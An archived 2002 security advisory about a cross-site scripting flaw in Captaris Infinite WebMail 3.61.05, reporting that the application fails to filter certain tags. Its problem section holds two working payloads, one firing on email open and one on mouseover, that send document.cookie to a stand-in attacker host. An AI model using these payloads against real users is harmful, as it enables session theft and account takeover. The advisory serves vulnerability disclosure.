TUCoPS :: Windows Apps :: sb5883.htm

Captaris (Infinite) WebMail XSS
17th Dec 2002 [SBWID-5883]
COMMAND

	Captaris (Infinite) WebMail XSS

SYSTEMS AFFECTED

	At least WebMail v3.61.05

PROBLEM

	In pedram [http://pedram.redhive.com] advisory :
	
	 http://pedram.redhive.com/advisories/dogmail.cgi
	
	
	Captaris (www.captaris.com) Infinite WebMail application  is  vulnerable
	to Cross-Site Scripting (XSS) attacks. The application fails  to  filter
	the following tags that can both be  used  to  redirect  a  user  to  an
	attack script:
	
	Launch on e-mail open:
	
	    <p style="left:expression(document.location=
	    'http://attackers.server/cgi-bin/logger.cgi?'
	    +document.cookie)">
	
	Launch on mouse over:
	
	    <b onMouseOver= "document.location=
	    'http://attackers.server/cgi-bin/logger.cgi?'
	    +document.cookie\">
	
	I am sure there are other XSS attack methods that can also  be  utilized
	to bypass their basic filtering.

SOLUTION

	?

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH